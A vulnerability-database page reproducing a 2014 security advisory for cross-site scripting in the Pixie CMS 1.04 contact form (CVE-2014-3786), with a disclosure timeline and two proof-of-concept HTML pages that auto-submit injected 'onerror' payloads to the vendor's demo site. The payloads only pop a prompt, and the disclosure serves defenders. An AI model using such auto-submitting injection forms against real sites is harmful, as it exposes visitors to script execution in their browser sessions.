Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSimone MemoliPACKETSTORM:126870
HistoryMay 30, 2014 - 12:00 a.m.

Pixie CMS 1.04 Cross Site Scripting

2014-05-3000:00:00
Simone Memoli
packetstormsecurity.com
29

EPSS

0.002

Percentile

52.0%

JSON
`Pixie CMS v1.04 (Contact form) POST XSS Vulnerabilities  
  
Vendor: Pixie CMS  
Product web page: http://www.getpixie.co.uk  
Affected version: 1.04  
Severity: Medium  
CVE: CVE-2014-3786  
Demo page: http://demo.getpixie.co.uk  
  
Discovered by: Filippos Mastrogiannis (@filipposmastro)  
& Simone Memoli (@Simon90_Italy)  
  
Pixie is a free, open source CMS software a.k.a a small, simple,   
website maker (as the vendor states on its website)  
  
Description: Pixie (v1.04) suffers from several POST XSS vulnerabilities in  
the Contact form (contact.php). The user input through the POST parameters   
'uemail' and 'subject' are not properly sanitized allowing the attacker to   
execute HTML code into user's browser session on the affected site.  
  
The vulnerable component is the contact module of the Pixie v1.04 and it   
can be found at (/pixie_v1.04/admin/modules/contact.php) of the source code  
  
Tested on: Ubuntu 13.10 with Mozilla Firefox 29.0 / Microsoft Windows 7  
with Mozilla Firefox 29.0.1  
  
Proof Of Concept:  
  
<html>  
<title>Pixie CMS v1.04 Contact form (uemail parameter) XSS</title>  
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">  
<input type="hidden" name='uemail' value='"><img src=x onerror=prompt(document.domain);>'>  
<input type="hidden" name='contact' value='1'>  
<input type="hidden" name='subject' value='xss'>  
</form>  
<script>document.xss.submit();</script>  
</html>  
  
<html>  
<title>Pixie CMS v1.04 Contact form (subject parameter) XSS</title>  
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">  
<input type="hidden" name='uemail' value='xss'>  
<input type="hidden" name='contact' value='1'>  
<input type="hidden" name='subject' value='"><img src=x onerror=prompt(document.location);>'>  
</form>  
<script>document.xss.submit();</script>  
</html>  
  
  
Disclosure Timeline:  
  
[13.05.2014] Vulnerabilities discovered.  
[13.05.2014] Initial contact with the vendor.  
[15.05.2014] 1st response from the official maintainer.  
[30.05.2014] 2nd response from the official maintainer.  
[30.05.2014] Public security advisory released.  
  
`

Related

nvd 1
cvelist 1
prion 1
cve 1
nvd
nvd
CVE-2014-3786
2014-06-04 14:55:04
cvelist
cvelist
CVE-2014-3786
2014-06-04 14:00:00
prion
prion
Cross site scripting
2014-06-04 14:55:00
cve
cve
CVE-2014-3786
2014-06-04 14:55:04

EPSS

0.002

Percentile

52.0%

JSON
Related for PACKETSTORM:126870
nvd1cvelist1prion1cve1